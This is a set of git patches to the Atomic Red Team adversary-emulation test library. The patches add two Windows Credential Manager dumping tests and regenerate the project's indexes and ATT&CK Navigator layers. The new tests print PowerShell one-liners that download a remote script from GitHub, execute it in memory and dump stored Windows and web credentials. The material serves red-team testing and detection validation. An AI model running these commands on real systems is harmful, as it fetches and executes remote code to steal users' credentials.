credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 4835de52..cbe6e63b 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -3,6 +3,8 @@ credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell +credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell +credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index c55b55ee..f6da33e1 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -24,6 +24,8 @@ - Atomic Test #5: Find and Access Github Credentials [macos, linux] - [T1555 Credentials from Password Stores](../../T1555/T1555.md) - Atomic Test #1: Extract Windows Credential Manager via VBA [windows] + - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows] + - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows] - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md) - Atomic Test #1: Run Chrome-password Collector [windows] - Atomic Test #2: Search macOS Safari Cookies [macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index eeb67747..7bc31d02 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -12,6 +12,8 @@ - Atomic Test #4: Access unattend.xml [windows] - [T1555 Credentials from Password Stores](../../T1555/T1555.md) - Atomic Test #1: Extract Windows Credential Manager via VBA [windows] + - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows] + - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows] - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md) - Atomic Test #1: Run Chrome-password Collector [windows] - Atomic Test #3: LaZagne - Credentials from Browser [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4ebeaa43..686e91a6 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -1055,6 +1055,32 @@ credential-access: ' name: powershell + - name: Dump credentials from Windows Credential Manager With PowerShell [windows + Credentials] + auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3 + description: This module will extract the credentials from Windows Credential + Manager + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' + -UseBasicParsing); Get-PasswordVaultCredentials -Force \n" + - name: Dump credentials from Windows Credential Manager With PowerShell [web + Credentials] + auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240 + description: This module will extract the credentials from Windows Credential + Manager + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'' + -UseBasicParsing); Get-CredManCreds -Force + +' T1555.003: technique: created: '2020-02-12T18:57:36.041Z' diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md index c08e2e0b..76606bc1 100644 --- a/atomics/T1555/T1555.md +++ b/atomics/T1555/T1555.md @@ -6,6 +6,10 @@ - [Atomic Test #1 - Extract Windows Credential Manager via VBA](#atomic-test-1---extract-windows-credential-manager-via-vba) +- [Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]](#atomic-test-2---dump-credentials-from-windows-credential-manager-with-powershell-windows-credentials) + +- [Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]](#atomic-test-3---dump-credentials-from-windows-credential-manager-with-powershell-web-credentials) +
@@ -53,4 +57,52 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir +
+
+ +## Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] +This module will extract the credentials from Windows Credential Manager + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force +``` + + + + + + +
+
+ +## Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials] +This module will extract the credentials from Windows Credential Manager + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force +``` + + + + + +
From acb9c9d55e22ec12387fefd33eee14475a825a3a Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 11 Jun 2021 19:40:02 +0000 Subject: [PATCH 21/35] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.007/T1003.007.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml index d6e49b4a..fbadc564 100644 --- a/atomics/T1003.007/T1003.007.yaml +++ b/atomics/T1003.007/T1003.007.yaml @@ -3,6 +3,7 @@ attack_technique: T1003.007 display_name: 'OS Credential Dumping: Proc Filesystem' atomic_tests: - name: Dump individual process memory with sh (Local) + auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80 description: | Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. @@ -50,6 +51,7 @@ atomic_tests: rm -f "#{output_file}" - name: Dump individual process memory with Python (Local) + auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 description: | Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to copy a process's heap memory to an external file so it can be searched or exfiltrated later. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index e3e4f0c6..55f9ed27 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -714,3 +714,5 @@ c35ac4a8-19de-43af-b9f8-755da7e89c89 42f22b00-0242-4afc-a61b-0da05041f9cc c89becbe-1758-4e7d-a0f4-97d2188a23e3 8fd5a296-6772-4766-9991-ff4e92af7240 +7e91138a-8e74-456d-a007-973d67a0bb80 +437b2003-a20d-4ed8-834c-4964f24eec63 From 0c19189bf84feff4ccde122403d7f5454b867f9e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 11 Jun 2021 19:40:11 +0000 Subject: [PATCH 22/35] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/linux-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 4 +- .../Indexes/Indexes-Markdown/linux-index.md | 4 +- atomics/Indexes/Matrices/linux-matrix.md | 2 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/index.yaml | 101 ++++++++++++- atomics/T1003.007/T1003.007.md | 134 ++++++++++++++++++ 10 files changed, 248 insertions(+), 7 deletions(-) create mode 100644 atomics/T1003.007/T1003.007.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index fbe9e18a..836c4f9a 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 08f59b92..21e118de 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true}